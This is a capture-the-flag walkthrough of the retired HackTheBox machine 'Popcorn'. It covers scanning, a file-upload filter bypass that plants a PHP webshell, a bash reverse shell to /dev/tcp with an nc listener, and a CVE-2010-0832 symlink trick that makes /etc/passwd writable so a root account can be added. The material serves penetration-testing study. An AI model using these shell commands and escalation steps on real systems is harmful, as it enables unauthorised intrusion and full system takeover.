HackTheBox - Popcorn
| OS | Difficulty | IP Address | Status |
|---|---|---|---|
| Linux | Medium | 10.10.10.6 | Retired |
This box was classified as a medium box by ch4p on HackTheBox. It is also categorized as a OSCP-style box on TJNull’s list. While enumerating port 80, we find an instance of TorrentHoster where we get to upload an image and bypass its filtering to get our initial foothold. For privilege escalation, we leverage CVE-2010-0832 to get root.
Phase 1 - Enumeration
Nmap
As usual, we start off with a Nmap to identify open ports:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 3e:c8:1b:15:21:15:50:ec:6e:63:bc:c5:6b:80:7b:38 (DSA)
|_ 2048 aa:1f:79:21:b8:42:f4:8a:38:bd:b8:05:ef:1a:07:4d (RSA)
80/tcp open http Apache httpd 2.2.12 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.2.12 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
We find only two ports opened: (i) SSH (ii) HTTP
Port 80
Navigating to the webpage on port 80, we find simple texts:
Directory Buster
Doing a directory brute force, we find a few pages.
/index (Status: 200) [Size: 177]
/test (Status: 200) [Size: 47034]
/torrent (Status: 301) [Size: 310] [--> http://10.10.10.6/torrent/]
/rename (Status: 301) [Size: 309] [--> http://10.10.10.6/rename/]
/test
/rename
/torrent
We find TorrentHoster, which allows us to Sign Up for an account:
After we sign up and login, we find an upload page; where we can upload torrent files:
So, let’s test this upload feature. We go to the Kali website and a get torrent file; pass it to TorrentHoster:
Once uploaded, we notice that we can edit the file to contain an image for screenshot:
When we click to add an image, we get another window to upload in. We also notice that it only allows certain types of image types:
We get a upload successful message, and also can find the uploaded image in /torrent/upload:
Phase 2 - Exploitation
Testing Filters
There’s two methods to upload files, one through a torrent file and the other through an image. Let’s test through the image. If we submit a PHP shell, we get an “Invalid file”. So we have filters, as the image upload stated that only certain formats of images are to be uploaded.
There are three common ways for a website to check for valid types:
- File extension
- Content-Type header
- Magic Bytes
Bypassing Filters
Testing by add .php to the filename, doesn’t get blocked by the filter. So, we will replace the image contents with a PHP shell and name the file “cmd.php”:
And it works! We got a webshell.
GET /torrent/upload/7fe3d266746cd636e0b918516570592eb93c9a8a.php?cmd=bash+-c+'bash+-i+>%26+/dev/tcp/10.10.14.18/9001+0>%261' HTTP/1.1
Host: 10.10.10.6
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: /torrent/=; /torrent/torrents.php=; /torrent/login.php=; /torrent/index.php=; saveit_0=4; saveit_1=0; /torrent/torrents.phpfirsttimeload=0; PHPSESSID=52e42c83cd4621e503c78b6863edda94
Upgrade-Insecure-Requests: 1
┌──(kali㉿kali)-[~/CTF/HTB/machines/popcorn]
└─$ curl http://10.10.10.6/torrent/upload/0ba973670d943861fb9453eecefd3bf7d3054713.php --data-urlencode "cmd=bash -c 'bash -i >& /dev/tcp/10.10.14.18/9001 0>&1'"
And we get in as www-data
┌──(kali㉿kali)-[~/CTF/HTB/machines/popcorn]
└─$ nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.14.18] from (UNKNOWN) [10.10.10.6] 41373
bash: no job control in this shell
www-data@popcorn:/home/george$ cat user.txt
Phase 3 - Privilege Escalation
CVE-2010-0832
pam_motd (aka the MOTD module) in libpam-modules before 1.1.0-2ubuntu1.1 in PAM on Ubuntu 9.10 and libpam-modules before 1.1.1-2ubuntu5 in PAM on Ubuntu 10.04 LTS allows local users to change the ownership of arbitrary files via a symlink attack on .cache in a user’s home directory, related to “user file stamps” and the motd.legal-notice file.
CVE-2010-0832, a vulnerability in the Linux Authentication System (PAM) where I can get it to make my current user the owner of any file on the system.
www-data@popcorn:/home/george/.cache$ ls -la
...[snip]...
-rw-r--r-- 1 george george 0 Mar 17 2017 motd.legal-displayed
...[snip]...
The above file is currently empty because this file can lead to code execution as they are typically executed when a new session is created; in other words, logout and login. Googling around, we do find an exploit script on Exploit-DB exploit but let’s do this manually by analyzing the script.
SSH as www-data
If we try, we can’t delete the .cache directory in george’s home directory because its contents are owned by george and we are the www-data user. So, let’s go back to the www-data home directory, create a .ssh folder and generate a SSH key for us to login through.
www-data@popcorn:/var/www$ mkdir .ssh
www-data@popcorn:/var/www$ ssh-keygen -q -t rsa -N '' -C 'pam'
Enter file in which to save the key (/var/www/.ssh/id_rsa):
www-data@popcorn:/var/www$ ls -la .ssh
-rw------- 1 www-data www-data 1671 Nov 10 22:05 id_rsa
-rw-r--r-- 1 www-data www-data 385 Nov 10 22:05 id_rsa.pub
www-data@popcorn:/var/www$ cp .ssh/id_rsa.pub .ssh/authorized_keys
www-data@popcorn:/var/www$ chmod 600 .ssh/authorized_keys
Then we will copy the id_rsa and to our machine and login to Popcorn as www-data:
┌──(kali㉿kali)-[~/CTF/HTB/machines/popcorn]
└─$ chmod 600 id_rsa-www
┌──(kali㉿kali)-[~/CTF/HTB/machines/popcorn]
└─$ ssh -i id_rsa-www [email protected]
www-data@popcorn:~$
Now, if we notice; there’s .cache directory. Prior to our login with www-data, there wasn’t a .cache directory. So, let’s link delete .cache directory, link /etc/passwd to .cache and check /etc/passwd permission:
www-data@popcorn:~$ ls -la
drwxr-xr-x 2 www-data www-data 4096 2021-11-10 22:09 .cache
www-data@popcorn:~$ rm -rf .cache
www-data@popcorn:~$ ln -s /etc/passwd .cache
www-data@popcorn:~$ ls -la
lrwxrwxrwx 1 www-data www-data 11 2021-11-10 22:10 .cache -> /etc/passwd
www-data@popcorn:~$ ls -l /etc/passwd
-rw-r--r-- 1 root root 1031 2017-03-17 19:07 /etc/passwd
As we can see above, /etc/passwd is owned by root. So, let’s logout and login back in:
www-data@popcorn:~$ ls -l /etc/passwd
-rw-r--r-- 1 www-data www-data 1031 2017-03-17 19:07 /etc/passwd
And now we as the www-data user own the /etc/passwd file. Now we can generate a password hash, and add a user as root to the /etc/passwd file:
www-data@popcorn:~$ openssl passwd -1 potato
$1$7ed1OlEg$5jLtFfmPRvmIyklX3.SLO1
www-data@popcorn:~$ echo 'pot:$1$7ed1OlEg$5jLtFfmPRvmIyklX3.SLO1:0:0:pwned:/root:/bin/bash' >> /etc/passwd
Finally, login again, switch user to the added one and BAM!
www-data@popcorn:~$ su - pot
Password:
root@popcorn:~# id
uid=0(root) gid=0(root) groups=0(root)
root@popcorn:~# cat /root/root.txt
We are root!
Post a Comment